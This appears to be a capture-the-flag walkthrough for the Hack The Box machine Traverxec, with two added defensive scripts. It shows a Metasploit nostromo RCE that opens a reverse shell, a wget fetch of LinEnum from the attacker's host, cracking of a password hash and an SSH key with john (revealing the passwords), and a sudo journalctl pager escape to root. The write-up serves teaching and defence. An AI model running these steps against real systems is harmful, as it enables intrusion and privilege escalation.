Traverxec

Traverxec is an easy-difficulty Linux machine that is a good introduction to web-to-host exploitation as well as SSH usage.
Recon
We start off by scanning Traverxec's IP, 10.10.10.165, with nmap:
nmap -T4 -A -v 10.10.10.165
From our results we get the following ports and services
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Right off we see that it's only running two services, and we potentially have the web server's product name: nostromo.
We can use searchsploit to check whether there are any existing exploits for nostromo 1.9.6:
searchsploit nostromo
-------------------------------------------------------------------- -------------------------------------
 Exploit Title                                                       | Path (/usr/share/exploitdb/)
-------------------------------------------------------------------- -------------------------------------
 Nostromo - Directory Traversal Remote Command Execution (Metasploit) | exploits/multiple/remote/47573.rb
 nostromo 1.9.6 - Remote Code Execution                               | exploits/multiple/remote/47837.py
 nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution | exploits/linux/remote/35466.sh
-------------------------------------------------------------------- -------------------------------------
Perfect, we find that there's an RCE exploit for this version of nostromo.
Now let's fire up the Metasploit Framework with msfconsole and search for the exploit:
search nostromo
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/nostromo_code_exec 2019-10-20 good Yes Nostromo Directory Traversal Remote Command Execution
Perfect! msf has the exploit we want to use; now let's select and configure it.
Exploit
use exploit/multi/http/nostromo_code_exec
set LHOST tun0
set RHOST 10.10.10.165
set RPORT 80
run
After a few seconds we should get the following:
[*] Started reverse TCP handler on 10.10.15.64:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.15.64:4444 -> 10.10.10.165:59272) at 2020-04-11 02:34:42 -0700
Great! We have a shell. Unfortunately it's a limited shell, but we can fix that up by upgrading it to a full PTY shell with:
python -c 'import pty; pty.spawn("/bin/bash")'
Now with a full shell let's enumerate some more. Seeing as we only have a low-privilege shell right now, we need to get user. To do this we will get LinEnum https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
Once we have it, it's time to get it onto the victim. To do this we'll fire up a web server on our machine:
python -m SimpleHTTPServer
and on the victim we'll fetch it (IP and PORT are those of our web server):
wget http://IP:PORT/LinEnum.sh
Once we have it we need to set its permissions with chmod +x LinEnum.sh
and then run it: ./LinEnum.sh
Upon completion we find one line that stands out:
[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
We got a password hash! Coming back to our local machine, we'll put that hash into a file and run it through John:
touch hash
nano hash
john --wordlist=/root/Downloads/Dic/rockyou.txt hash
Nowonly4me (david)
Upon completion we get the password Nowonly4me
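As an added defensive check (not part of the original write-up), a script that classifies the hash scheme of each .htpasswd entry and flags the schemes that john chews through quickly, like the md5crypt entry found above; only the david line comes from the box, the other entries are constructed sample data.

```python
import re

# Constructed .htpasswd contents for the demo. The david line is the entry
# LinEnum reported in /var/nostromo/conf/.htpasswd above; the rest are made up.
SAMPLE_HTPASSWD = """\
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
alice:$apr1$Zc1kd9Xo$0Pb6sTlkkAVr6hY1yX1W.0
bob:$2y$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy
carol:{SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g=
dave:Xm0yZeKGF8ZR6
"""

# (prefix, scheme name, weak?). Everything except bcrypt is cheap to attack
# offline with john, which is exactly how the md5crypt hash fell above.
SCHEMES = [
    ("$2y$", "bcrypt", False),
    ("$2a$", "bcrypt", False),
    ("$2b$", "bcrypt", False),
    ("$apr1$", "apr1 (Apache MD5)", True),
    ("$1$", "md5crypt", True),
    ("{SHA}", "SHA-1 (unsalted)", True),
]

def classify(hashval):
    """Return (scheme, weak) for one .htpasswd hash field."""
    for prefix, name, weak in SCHEMES:
        if hashval.startswith(prefix):
            return name, weak
    if re.fullmatch(r"[./0-9A-Za-z]{13}", hashval):
        return "DES crypt", True  # 8-character password limit, 12-bit salt
    return "unknown/plaintext", True

def audit_htpasswd(text):
    """Parse .htpasswd text; return a list of (user, scheme, weak) tuples."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, hashval = line.split(":", 1)
        scheme, weak = classify(hashval)
        findings.append((user, scheme, weak))
    return findings

if __name__ == "__main__":
    for user, scheme, weak in audit_htpasswd(SAMPLE_HTPASSWD):
        print(f"{'WEAK' if weak else 'ok  '} {user:<8} {scheme}")
```

Run it against a real file with audit_htpasswd(open(path).read()); any WEAK entry should be regenerated with a bcrypt-capable htpasswd tool.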
We also see that /home/david/public_www contains a folder protected-file-area which is protected by .htaccess.
Checking the nostromo documentation http://www.nazgul.ch/dev/nostromo_man.html we see that there is yet another directory we can access, ~david.
Trying to access this directory gives us the following page:

Doesn't look very interesting, does it? Well, typing in the URL 10.10.10.165/~david/protected-file-area
gives us an auth screen, and we already have the credentials for it: david:Nowonly4me.
It takes us to an index page where we can download backup-ssh-identity-files.tgz.
Once downloaded we can extract the SSH keys; it gives us the following files:
/david/.ssh/
/david/.ssh/authorized_keys
/david/.ssh/id_rsa
/david/.ssh/id_rsa.pub
Unfortunately the id_rsa is encrypted, but luckily we can pass it through john:
python /usr/share/john/ssh2john.py ~/HTB/Traverexec/home/david/.ssh/id_rsa > ~/HTB/Traverexec/ssh.txt
john ssh.txt --wordlist=~/Downloads/Dic/rockyou.txt
hunter (/root/HTB/Traverexec/home/david/.ssh/id_rsa)
Great! We got the password hunter; we can now use this with id_rsa to connect via ssh:
ssh -i id_rsa david@10.10.10.165
And with that we have user!
Post Exploitation
Checking the bin directory in David's home we find:
david@traverxec:~/bin$ ls -ahlrs
total 16K
4.0K -rwx------ 1 david david 363 Oct 25 16:26 server-stats.sh
4.0K -r-------- 1 david david 802 Oct 25 16:26 server-stats.head
4.0K drwx--x--x 5 david david 4.0K Oct 25 17:02 ..
4.0K drwx------ 2 david david 4.0K Oct 25 16:26 .
server-stats.head gives us a banner, not much use; however, checking server-stats.sh we get the following:
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
The last line, /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat, shows us that journalctl is being run as root via sudo, so can we exploit this?
Yes we can! Checking GTFOBins https://gtfobins.github.io/gtfobins/journalctl/ we find that simply typing !/bin/sh from within journalctl's pager can give us root access! The script pipes the output through cat so no pager appears, but run the sudo command on its own and it does:
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
Apr 24 01:05:26 traverxec sudo[807]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 24 01:05:26 traverxec sudo[807]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): conversation failed
Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 24 01:48:40 traverxec sudo[1574]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
!/bin/sh
root@traverexec:/home/david/bin# cd /root/
root@traverexec:~# cat root.txt
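As an added detection example (not part of the original write-up), a script that scans sudo log lines in the format shown above and flags two things: sudo use by a service account such as www-data, which is the footprint a web shell leaves when it probes for privilege escalation, and sudo rules exercised for pager-driven binaries like journalctl without --no-pager. The www-data lines are the ones from the journal above; the david line is constructed.

```python
import re

# Constructed sample in the sudo syslog format shown above. The www-data lines
# are the ones from the nostromo.service journal; the david line is made up to
# show the journalctl rule this write-up abuses being exercised.
SAMPLE_LOG = """\
Apr 24 01:05:26 traverxec sudo[807]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 24 01:05:26 traverxec sudo[807]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): conversation failed
Apr 24 01:48:40 traverxec sudo[1574]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
Apr 24 02:10:03 traverxec sudo[1702]: david : TTY=pts/0 ; PWD=/home/david/bin ; USER=root ; COMMAND=/usr/bin/journalctl -n5 -unostromo.service
"""

# sudo's "user : key=value ; ... ; COMMAND=..." record; pam_unix lines are skipped.
SUDO_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sudo\[\d+\]: "
    r"(?P<user>\S+) : .*COMMAND=(?P<cmd>.*)$"
)

# Accounts a web server or daemon runs as; they have no business calling sudo.
SERVICE_ACCOUNTS = {"www-data", "nobody", "apache", "nginx"}
# Binaries that hand root an interactive pager (less) with a shell escape.
PAGER_BINARIES = {"journalctl", "less", "more", "man", "systemctl"}

def analyse_sudo_log(text):
    """Return a list of (severity, timestamp, user, reason) for suspicious sudo use."""
    findings = []
    for line in text.splitlines():
        m = SUDO_RE.match(line)
        if not m:
            continue
        user, cmd = m["user"], m["cmd"]
        if user in SERVICE_ACCOUNTS:
            # 'sudo -l' is logged as COMMAND=list: a www-data shell probing for
            # privilege escalation, exactly what the journal above recorded.
            findings.append(("HIGH", m["ts"], user, f"service account invoked sudo ({cmd})"))
        parts = cmd.split()
        binary = parts[0].rsplit("/", 1)[-1] if parts else ""
        if binary in PAGER_BINARIES and "--no-pager" not in parts:
            findings.append(("MEDIUM", m["ts"], user,
                             f"{binary} run as root with its pager enabled: shell escape possible"))
    return findings

if __name__ == "__main__":
    for sev, ts, user, reason in analyse_sudo_log(SAMPLE_LOG):
        print(f"{sev:<6} {ts} {user}: {reason}")
```

The fix for the MEDIUM finding is to restrict the sudoers entry to the exact command with --no-pager, so the pager and its shell escape never run as root.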